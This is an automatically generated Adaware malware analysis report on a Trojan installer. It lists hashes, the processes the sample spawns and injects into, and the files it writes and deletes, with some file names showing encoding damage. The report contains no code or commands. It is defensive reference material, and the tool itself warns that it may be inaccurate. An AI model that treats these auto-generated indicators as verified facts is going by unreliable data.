Trojan.NSIS.StartPage_4ef0a3733f – Adaware

Trojan.NSIS.StartPage.FD, Trojan.Win32.IEDummy.FD, mzpefinder_pcap_file.YR, BankerGeneric.YR (Lavasoft MAS)Behaviour: Banker, Trojan

The description has been automatically generated by Lavasoft Malware Analysis System and it may contain incomplete or inaccurate information.

Summary

MD5: 4ef0a3733fc5a67cf2f092543e147b35

SHA1: faaf987b561e20472df41e1212eefa0d7b4ee66e

SHA256: 6c1fccf0dabb305645fbd5c94fbb20edeb24fe9ba33a74ed0616db0213e91019

SSDeep: 196608:/5nXAPYOn5M6jOlYBjuc8xJDKtBP0vucdOsI YVQMqmQUxPPcULmswJ3W7ixKk9S:xnAYSMw 0unXnvv0TsuPPTwJG7/koNWO

Size: 13738518 bytes

File type: EXE

Platform: WIN32

Entropy: Packed

PEID: UPolyXv05_v6

Company: no certificate found

Created at: 2010-04-10 15:19:23

Analyzed on: WindowsXP SP3 32-bit

Summary: Trojan. A program that appears to do one thing but actually does another (a.k.a. Trojan Horse).

Dynamic Analysis

Payload

No specific payload has been found.

Process activity

The Trojan creates the following process(es):

9158chat2_ktv088_63.exe:2116
sr.exe:244
9158IE.exe:3116
xianfengkunbang.exe:1324
BaiduP2PService.exe:252
BaiduP2PService.exe:472
RsMgrSvc.exe:1936
regsvr32.exe:2380
regsvr32.exe:2448
regsvr32.exe:2328
regsvr32.exe:2480
9158.exe:3012
popwndexe.exe:760
xianfengupdate.exe:660
%original file name%.exe:1736

The Trojan injects its code into the following process(es):

MM-liao8863.exe:2808
xianfeng.exe:272
QQPCDownload71960.exe:2776
install1393485.exe:1148

Mutexes

The following mutexes were created/opened:No objects were found.

File activity

The process 9158chat2_ktv088_63.exe:2116 makes changes in the file system.

The Trojan creates and/or writes to the following file(s):

%Documents and Settings%\%current user%\Start Menu\Programs\9158Ã‚Â¶ÃƒÂ ÃƒË†Ãƒâ€¹ÃƒÅ Ãƒâ€œÃƒâ€ Ã‚Âµ\ÃƒÂÃ‚Â¶Ãƒâ€ÃƒËœ 9158Ã‚Â¶ÃƒÂ ÃƒË†Ãƒâ€¹ÃƒÅ Ãƒâ€œÃƒâ€ Ã‚Âµ.lnk (715 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nss12.tmp\loading2.bmp (784 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nss12.tmp\loading1.bmp (784 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nss12.tmp\install_step1.bmp (22192 bytes)
%Documents and Settings%\%current user%\Start Menu\Programs\9158Ã‚Â¶ÃƒÂ ÃƒË†Ãƒâ€¹ÃƒÅ Ãƒâ€œÃƒâ€ Ã‚Âµ\9158Ã‚Â¶ÃƒÂ ÃƒË†Ãƒâ€¹ÃƒÅ Ãƒâ€œÃƒâ€ Ã‚Âµ.lnk (707 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nss12.tmp\SkinBtn.dll (4 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nss12.tmp\install.bmp (4992 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nss12.tmp\System.dll (11 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nss12.tmp\close.bmp (824 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nss12.tmp\install_step2.bmp (22192 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nss12.tmp\install_step3.bmp (22192 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nss12.tmp\return.bmp (4 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nss12.tmp\finish.bmp (4992 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nss12.tmp\checkbox2.bmp (3 bytes)
%Documents and Settings%\%current user%\Desktop\9158Ã‚Â¶ÃƒÂ ÃƒË†Ãƒâ€¹ÃƒÅ Ãƒâ€œÃƒâ€ Ã‚Âµ.lnk (601 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsc11.tmp (1012028 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nss12.tmp (4 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nss12.tmp\custom.bmp (4 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nss12.tmp\checkbox1.bmp (3 bytes)

The Trojan deletes the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\nss12.tmp\loading2.bmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nss12.tmp\finish.bmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nss12.tmp\custom.bmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nss10.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nss12.tmp\loading1.bmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nss12.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nss12.tmp\close.bmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nss12.tmp\System.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nss12.tmp\install_step3.bmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nss12.tmp\return.bmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nss12.tmp\install.bmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nss12.tmp\install_step2.bmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nss12.tmp\checkbox2.bmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nss12.tmp\install_step1.bmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nss12.tmp\SkinBtn.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nss12.tmp\checkbox1.bmp (0 bytes)

The process sr.exe:244 makes changes in the file system.

The Trojan creates and/or writes to the following file(s):

%Documents and Settings%\All Users\Application Data\Baidu\BaiduPlayer\install.txt (344 bytes)

The process xianfengkunbang.exe:1324 makes changes in the file system.

The Trojan creates and/or writes to the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\nsr9.tmp\nsTools.dll (9608 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsr8.tmp (48917 bytes)
%Program Files%\tools\BaiduP2PService.exe (17848 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsr9.tmp\System.dll (11 bytes)
%Program Files%\tools\P2PStatReport.dll (12536 bytes)
%Program Files%\tools\P2SBase.dll (18424 bytes)
%Program Files%\tools\P2PBase.dll (17848 bytes)
%Program Files%\tools\sr.exe (5520 bytes)

The Trojan deletes the following file(s):

%Program Files%\tools\isWrite (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsr9.tmp\nsTools.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsr9.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsc7.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsr9.tmp\System.dll (0 bytes)

The process MM-liao8863.exe:2808 makes changes in the file system.

The Trojan creates and/or writes to the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\M9YNOH2J\xui[1].js (8 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OZ0N258D\CA4PMRS9.htm (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\M9YNOH2J\CAURKDUJ.htm (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OZ0N258D\icons[1].gif (7 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\ONADSPW5\Opendownloadernewxml[1].htm (899 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\6N8PMZAJ\Downloaderconfig[1].htm (948 bytes)
%Program Files%\9158ktv\DownLoad\9158chat2_ktv088_63.exe.tmp (121120 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\ONADSPW5\CA8HUBK5.htm (764 bytes)
C:\temp.icon (776 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\6N8PMZAJ\main[1].ico (776 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\ONADSPW5\1[1].swf (48341 bytes)

The process BaiduP2PService.exe:472 makes changes in the file system.

The Trojan creates and/or writes to the following file(s):

%Documents and Settings%\%current user%\Application Data\Microsoft\CryptnetUrlCache\Content\62B5AF9BE9ADC1085C3C56EC07A82BF6 (148 bytes)
%Documents and Settings%\%current user%\Application Data\Microsoft\CryptnetUrlCache\Content\2BF68F4714092295550497DD56F57004 (18 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\CabA.tmp (54 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\CabE.tmp (50 bytes)
%Documents and Settings%\%current user%\Application Data\Microsoft\CryptnetUrlCache\MetaData\2BF68F4714092295550497DD56F57004 (408 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\CabC.tmp (54 bytes)
%Documents and Settings%\%current user%\Application Data\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015 (408 bytes)
%Documents and Settings%\All Users\Application Data\Baidu\BaiduPlayer\download\QQPCDownload71960.exe.bdtp (158659 bytes)
%Documents and Settings%\All Users\Application Data\Baidu\BaiduPlayer\download\QQPCDownload71960.exe.bdre (1040 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\TarD.tmp (2712 bytes)
%Documents and Settings%\All Users\Application Data\Baidu\BaiduPlayer\download\MM-liao8863.exe.bdtp (117549 bytes)
%Documents and Settings%\All Users\Application Data\Baidu\BaiduPlayer\download\ch_dl_url.exe.bdre (2840 bytes)
%Documents and Settings%\All Users\Application Data\Baidu\BaiduPlayer\download\ch_dl_url.exe.bdtp (412553 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\TarB.tmp (2712 bytes)
%Documents and Settings%\%current user%\Application Data\Microsoft\CryptnetUrlCache\MetaData\8DFDF057024880D7A081AFBF6D26B92F (176 bytes)
%Documents and Settings%\All Users\Application Data\Baidu\BaiduPlayer\download\MM-liao8863.exe.bdre (892 bytes)
%Documents and Settings%\%current user%\Application Data\Microsoft\CryptnetUrlCache\Content\94308059B57B3142E455B38A6EB92015 (50 bytes)
%Documents and Settings%\%current user%\Application Data\Microsoft\CryptnetUrlCache\Content\8DFDF057024880D7A081AFBF6D26B92F (533 bytes)
%Documents and Settings%\All Users\Application Data\Baidu\BaiduPlayer\bdsecushr.dat (3628 bytes)
%Documents and Settings%\%current user%\Application Data\Microsoft\CryptnetUrlCache\MetaData\62B5AF9BE9ADC1085C3C56EC07A82BF6 (224 bytes)
%Documents and Settings%\All Users\Application Data\Baidu\BaiduPlayer\download\install1393485.exe.bdtp (568599 bytes)
%Documents and Settings%\All Users\Application Data\Baidu\BaiduPlayer\tasks.dat (2420 bytes)
%Documents and Settings%\All Users\Application Data\Baidu\BaiduPlayer\download\install1393485.exe.bdre (2124 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\TarF.tmp (2712 bytes)

The Trojan deletes the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\TarD.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\CabC.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\CabE.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\TarB.tmp (0 bytes)
%Documents and Settings%\All Users\Application Data\Baidu\BaiduPlayer\download\MM-liao8863.exe.bdre (0 bytes)
%Documents and Settings%\All Users\Application Data\Baidu\BaiduPlayer\download\install1393485.exe.bdre (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\TarF.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\CabA.tmp (0 bytes)
%Documents and Settings%\All Users\Application Data\Baidu\BaiduPlayer\download\QQPCDownload71960.exe.bdre (0 bytes)
%Documents and Settings%\All Users\Application Data\Baidu\BaiduPlayer\tasks.ini (0 bytes)

The process xianfeng.exe:272 makes changes in the file system.

The Trojan creates and/or writes to the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\nsf4.tmp\ioSpecial.ini (1796 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsf4.tmp\System.dll (11 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsf4.tmp\modern-wizard.bmp (26 bytes)

The Trojan deletes the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\nsf4.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsf3.tmp (0 bytes)

The process RsMgrSvc.exe:1936 makes changes in the file system.

The Trojan creates and/or writes to the following file(s):

%Program Files%\Rising\RSD\RsMgrSvc.exe.log (367 bytes)
%Program Files%\Rising\RSD\RsMgrSvc.dat (708 bytes)

The process QQPCDownload71960.exe:2776 makes changes in the file system.

The Trojan creates and/or writes to the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\TencentDownload\~508f0\QQPCDetector.dll (5257 bytes)
%Documents and Settings%\%current user%\Application Data\Tencent\QQPCMgr\Download\QQPCMgr_Setup.exe (454597 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\TencentDownload\~508f0\setup.xml (580 bytes)
%Documents and Settings%\%current user%\Application Data\Tencent\QQPCMgr\Download\version (672 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\TencentDownload\~508f0\QQPCDownload.dll (9775 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\TencentDownload\~508f0\qmdr\dr.dll (75 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\TencentDownload\~508f0\QQPCDownload.kui (1661 bytes)

The Trojan deletes the following file(s):

%Documents and Settings%\%current user%\Application Data\Tencent\QQPCMgr\Download\version (0 bytes)

The process install1393485.exe:1148 makes changes in the file system.

The Trojan creates and/or writes to the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\ui\snin.htm (527 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\ravdefdb\rsmon.db1 (43 bytes)
%Program Files%\Rising\RSD\RsMgrSvc.exe (673 bytes)
%Program Files%\Rising\RSD\Backup\RSD\RSSetup\rsdinfo.dll (601 bytes)
%Program Files%\Rising\RSD\RsMgrsvc.ini (60 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\cloudv3\userdata.rstray (293 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\rscomm\moncom08.dll (443 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\monbasedui\moncomm.dll (1222 bytes)
%Program Files%\Rising\RSD\Backup\RAV\HOOKBASE\sysmon.sys (673 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\label.dat (384 bytes)
%Program Files%\Rising\RSD\Backup\RAV\CLOUDV3\datastorage.db (19 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\CfgDll.dll (701 bytes)
%Program Files%\Rising\RSD\Backup\RAV\RSDK\comx3.dll (673 bytes)
%Program Files%\Rising\RSD\Backup\RAV\RSCFG\rscfg.dll (53 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\ravmaindui\rsmain.dll (1353 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\rav936\lics936.txt (8 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\rscomm\rscommx2.dll (479 bytes)
%Program Files%\Rising\RSD\XMLS\RSSetup.xml (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\RsMgrSvc.exe (1855 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\ravdefdb\uprsuser.dat (10 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\hookbase\kguard.sys (1707 bytes)
%Program Files%\Rising\RSD\Backup\RAV\RSCFG\RSCFG.xml (996 bytes)
%Program Files%\Rising\RSD\Backup\RSD\RSSetup\RSD932\Jpn.lag (37 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\os.xml (685 bytes)
%Program Files%\Rising\RSD\Backup\RSD\RSSetup\Setup.exe (5441 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\rsdk\rsxml3w.dll (1848 bytes)
%Program Files%\Rising\RSD\Backup\RAV\RAVMON\RAVMON.xml (574 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\_rav\_rav.xml (368 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\rsdk\comx3.dll (709 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\monbasedui\monbasedui.xml (1 bytes)
%Program Files%\Rising\RSD\Backup\RAV\RAVCONFIG\RAVCONFIG.xml (518 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\RstoreDll.dll (953 bytes)
%Program Files%\Rising\RSD\RSD950\CHT.lag (28 bytes)
%Program Files%\Rising\RSD\Backup\RAV\RSMONDEF\selfmon.dll (601 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\ravbase\url.ini (4 bytes)
%Program Files%\Rising\RSD\Backup\RAV\MSCRT9\atl90.dll (673 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\cloudv3\userdata.mond (485 bytes)
%Program Files%\RsTest.ini (14 bytes)
%Program Files%\Rising\RSD\Backup\RSD\RSSetup\os.xml (685 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\ravxp\ravxp.exe (86 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\ravconfig\ravconfig.xml (518 bytes)
%Program Files%\Rising\RSD\updater.exe (3361 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\cloudv3\cloudnotifier.dll (2752 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\license\12345678.000 (48 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\mscrt9\Microsoft.VC90.ATL.manifest (466 bytes)
%Program Files%\Rising\RSD\Backup\RAV\RAVDEFDB\uprsmon.dat (45 bytes)
%Program Files%\Rising\RSD\Backup\RAV\RSDK\dfw.dll (1281 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\hookbase\rsutils.sys (734 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\CompsVer.inf (2 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\ravbase\LogDc.bmp (24 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\Setup.exe (8063 bytes)
%Program Files%\Rising\RSD\Backup\RAV\HOOKBASE\rsndisp.sys (10 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\ravbase\ravbase.xml (4 bytes)
%Program Files%\Rising\RSD\Backup\RAV\CLOUDV3\userdata.mond (485 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\setup.dll (3859 bytes)
%Program Files%\Rising\RSD\Backup\RAV\RAVBASE\LogAc.bmp (24 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\cloudv3\cloudv3.xml (1 bytes)
%Program Files%\Rising\RSD\Backup\RAV\RAVBASE\RavSetup.dll (7433 bytes)
%Program Files%\Rising\RSD\Backup\RAV\RAVXP\RAVXP.xml (404 bytes)
%Program Files%\Rising\RSD\Backup\RAV\RSMONDEF\bacore.dll (2321 bytes)
%Program Files%\Rising\RSD\setup.dat (601 bytes)
%Program Files%\Rising\RSD\rslang.dll (673 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\ravlog\ravlog.xml (545 bytes)
%Program Files%\Rising\RSD\Backup\RSD\RSSetup\rslang.dll (673 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\hookbase\64\rsndisp.sys (11 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\mscrt9\mscrt9.xml (961 bytes)
%Program Files%\Rising\RSD\Backup\RAV\RSDK\rscom.dll (673 bytes)
%Program Files%\Rising\RSD\Backup\RSD\RSSetup\comx3.dll (673 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\rav936\chs.lag (7 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\rsmondef\rsmondef.xml (1 bytes)
%Program Files%\Rising\RSD\Backup\RSD\RSSetup\CfgDll.dll (1425 bytes)
%Program Files%\Rising\RSD\Backup\RAV\RAVMAINDUI\rsmain.dll (601 bytes)
%Program Files%\Rising\RSD\Backup\RAV\RSMONDEF\defmon.dll (3361 bytes)
%Program Files%\Rising\RSD\Backup\RAV\RAVXP\ravxp.exe (601 bytes)
%Program Files%\Rising\RSD\ui\snin.htm (527 bytes)
%Program Files%\Rising\RSD\Backup\RAV\RSCOMM\cnt09.dll (1281 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\rsmondef\bawhite.dat (22 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\ravconfig\mergexml.dll (117 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\cloudv3\Cloudv3.dll (4727 bytes)
%Program Files%\Rising\RSD\rsmginfo.dll (2105 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\ravlog\rslog.dll (25 bytes)
%Program Files%\Rising\RSD\comx3.dll (673 bytes)
%Program Files%\Rising\RSD\Backup\RAV\RAVBASE\LogDc.bmp (24 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\comx3.dll (693 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\mscrt9\Microsoft.VC90.CRT.manifest (496 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\rslang.dll (1655 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\ravmon\ravmon.xml (574 bytes)
%Program Files%\Rising\RSD\Backup\RAV\RSMONDEF\adefmon.mond (2 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\localopt.dll (2190 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\ravmon\mond.xml (2 bytes)
%Program Files%\Rising\RSD\Backup\RAV\RAVBASE\url.ini (4 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\ravxp\ravxp.xml (404 bytes)
%Program Files%\Rising\RSD\Backup\RAV\HOOKBASE\rsdll.dll.dat (601 bytes)
%Program Files%\Rising\RSD\os.xml (685 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RAV.cfg (48 bytes)
%Program Files%\Rising\RSD\Backup\RAV\CLOUDV3\userdata.rstray (293 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\Custom.xml (775 bytes)
%Program Files%\Rising\RSD\Backup\RAV\RAVBASE\repairmanager.mondcoms (232 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\RSSETUP.xml (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\rscomm\rssqlite.dll (4311 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\rsmondef\monrule.dll (211 bytes)
%Program Files%\Rising\RSD\Backup\RAV\RAVMON\mondcoms.xml (8 bytes)
%Program Files%\Rising\RSD\Backup\RAV\RAV936\lics936.txt (8 bytes)
%Program Files%\Rising\RSD\Backup\RAV\RAV936\chs.lag (7 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\mscrt9\atl90.dll (1254 bytes)
%Program Files%\Rising\RSD\Backup\RAV\HOOKBASE\rsutils_if.dll (58 bytes)
%Program Files%\Rising\RSD\Backup\RSD\RSSetup\setup.dat (601 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\hookbase\sysmon.sys (2740 bytes)
%System%\drivers\protreg.sys (24 bytes)
%Program Files%\Rising\RSD\Backup\RSD\RSSetup\localopt.dll (1425 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\cloudqry\rscurl.dll (3126 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\cloudqry\cloudnet.dll (2054 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\RSD936\CHS.lag (28 bytes)
%Program Files%\Rising\RSD\Backup\RSD\RSSetup\protreg.sys (24 bytes)
%Program Files%\Rising\RSD\Backup\RSD\RSSetup\RsBackup.exe (2105 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\ravbase\repairmanager.mond (207 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\ravbase\Rising.ico (3 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\rscomm\rscomm.xml (2 bytes)
%Program Files%\Rising\RSD\Backup\RAV\RAVBASE\RAVBASE.xml (4 bytes)
%Program Files%\Rising\RSD\Backup\RAV\HOOKBASE\64\rsutils.sys (601 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\ravbase\rstask.xml (4 bytes)
%Program Files%\Rising\RSD\Backup\RSD\RSSetup\RSSetup.xml (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\ONADSPW5\c[1].aspx (2 bytes)
%Program Files%\Rising\RSD\Backup\RAV\RSDK\procenv.dll (29 bytes)
%Program Files%\Rising\RSD\Backup\RAV\CLOUDV3\CLOUDV3.xml (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\RsStub.exe (1762 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\license\license.xml (347 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\syslay.dll (316 bytes)
%Program Files%\Rising\RSD\Backup\RAV\RSCOMM\cnt08.dll (673 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\updater.exe (7115 bytes)
%Program Files%\Rising\RSD\Backup\RAV\CLOUDV3\dataups.dat (207 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\Rav.7z (22865 bytes)
%Program Files%\Rising\RSD\Backup\RAV\MSCRT9\Microsoft.VC90.CRT.manifest (496 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\ravmaindui\ravmaindui.xml (1 bytes)
%Program Files%\Rising\RSD\Backup\RAV\MSCRT9\msvcp90.dll (3361 bytes)
%Program Files%\Rising\RSD\Backup\RAV\MSCRT9\msvcr90.dll (4185 bytes)
%Program Files%\Rising\RSD\Backup\RAV\CLOUDV3\cloudwork.dll (7726 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\cloudv3\datastorage.db (19 bytes)
%Program Files%\Rising\RSD\Backup\RAV\RSMONDEF\bawhite.dat (22 bytes)
%Program Files%\Rising\RSD\Backup\RAV\RSDK\traywnd.dll (601 bytes)
%Program Files%\Rising\RSD\Backup\RAV\_RAV\setup.xml (2 bytes)
%Program Files%\Rising\RSD\Backup\RAV\CLOUDV3\Cloudv3.dll (3073 bytes)
%Program Files%\Rising\RSD\Backup\RAV\HOOKBASE\rsutils.sys (601 bytes)
%Program Files%\Rising\RSD\RSD932\Jpn.lag (37 bytes)
%Program Files%\Rising\RSD\Backup\RAV\RAVBASE\setup.dat (601 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\protreg.sys (24 bytes)
%Program Files%\Rising\RSD\update.xml (164 bytes)
%Program Files%\Rising\RSD\popwndexe.exe (601 bytes)
%Program Files%\Rising\RSD\Backup\RAV\RSCOMM\RsBaseNetWrapper.dll (48 bytes)
%Program Files%\Rising\RSD\Backup\RAV\RSMONDEF\RSMONDEF.xml (1 bytes)
%Program Files%\Rising\RSD\Backup\RAV\RAVBASE\RsTray.ico (601 bytes)
%Program Files%\Rising\RSD\Data\RAV\RAV.ini (50 bytes)
%Program Files%\Rising\RSD\Backup\RSD\RSSetup\update.xml (164 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\update.xml (164 bytes)
%Program Files%\Rising\RSD\Backup\RAV\RSCOMM\Proccomm.dll (673 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\RSD950\CHT.lag (28 bytes)
%Program Files%\Rising\RSD\Backup\RAV\RSDK\RSDK.xml (1 bytes)
%Program Files%\Rising\RSD\Backup\RAV\RAVLOG\RAVLOG.xml (545 bytes)
%Program Files%\Rising\RSD\Backup\RAV\RSCOMM\moncom08.dll (601 bytes)
%Program Files%\Rising\RSD\Backup\RAV\_RAV\_RAV.xml (368 bytes)
%Program Files%\Rising\RSD\RsAppMgr.dll (64 bytes)
%Program Files%\Rising\RSD\Backup\RAV\RAVBASE\pngdll.dll (1425 bytes)
%Program Files%\Rising\RSD\Backup\RSD\RSSetup\RSD1252\Eng.lag (52 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\rsmginfo.dll (1115 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\rscomm\syslay.dll (26 bytes)
%Program Files%\Rising\RSD\RsStub.exe (64 bytes)
